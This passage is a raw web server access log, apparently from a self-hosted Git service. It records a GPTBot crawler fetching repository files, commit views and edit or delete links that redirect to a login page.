"/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 74.7.227.38] [Length 11721] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:15:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 74.7.227.38] [Length 11696] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:15:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:15:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 74.7.227.38] [Length 11722] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:15:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" +[17/Feb/2026:15:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 74.7.227.38] [Length 10958] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:15:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 74.7.227.38] [Length 11723] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:15:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" +[17/Feb/2026:15:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:15:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" +[17/Feb/2026:15:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12759] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" +[17/Feb/2026:15:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" +[17/Feb/2026:15:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.tsx" [Client 74.7.227.38] [Length 11830] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:33:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" +[17/Feb/2026:15:33:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" +[17/Feb/2026:15:33:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" +[17/Feb/2026:15:33:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/database.sqlite" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/database.sqlite" +[17/Feb/2026:15:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/database.sqlite" +[17/Feb/2026:15:33:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" +[17/Feb/2026:15:33:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" +[17/Feb/2026:15:33:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" +[17/Feb/2026:15:33:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Hero.tsx" +[17/Feb/2026:15:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/Hero.tsx" +[17/Feb/2026:15:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" +[17/Feb/2026:15:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" +[17/Feb/2026:15:33:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" +[17/Feb/2026:15:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/index.tsx" +[17/Feb/2026:15:33:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" +[17/Feb/2026:15:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/index.tsx" +[17/Feb/2026:15:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" +[17/Feb/2026:15:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/index.tsx" [Client 74.7.227.38] [Length 804] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" +[17/Feb/2026:15:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" +[17/Feb/2026:15:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf?display=source" [Client 74.7.227.38] [Length 11674] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" +[17/Feb/2026:15:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" +[17/Feb/2026:15:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 26552] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js" +[17/Feb/2026:15:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md?display=source" [Client 74.7.227.38] [Length 11757] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" +[17/Feb/2026:15:33:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" +[17/Feb/2026:15:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=leastissues&state=open" [Client 74.7.227.38] [Length 8495] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" +[17/Feb/2026:15:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12767] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:15:33:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" +[17/Feb/2026:15:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/About.tsx" +[17/Feb/2026:15:33:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:34:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Services.tsx" +[17/Feb/2026:15:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/Services.tsx" +[17/Feb/2026:15:34:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" +[17/Feb/2026:15:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Contact.tsx" +[17/Feb/2026:15:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/index.tsx" [Client 74.7.227.38] [Length 11095] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" +[17/Feb/2026:15:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/index.tsx" [Client 74.7.227.38] [Length 9758] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" +[17/Feb/2026:15:34:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" +[17/Feb/2026:15:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/js/i18n.js" +[17/Feb/2026:15:34:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" +[17/Feb/2026:15:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/js/i18n.js" +[17/Feb/2026:15:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 35758] [Gzip 11.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" +[17/Feb/2026:15:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 2407] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" +[17/Feb/2026:15:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 20952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" +[17/Feb/2026:15:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 10450] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" +[17/Feb/2026:15:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:15:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:15:34:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" +[17/Feb/2026:15:34:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/index.tsx" [Client 74.7.227.38] [Length 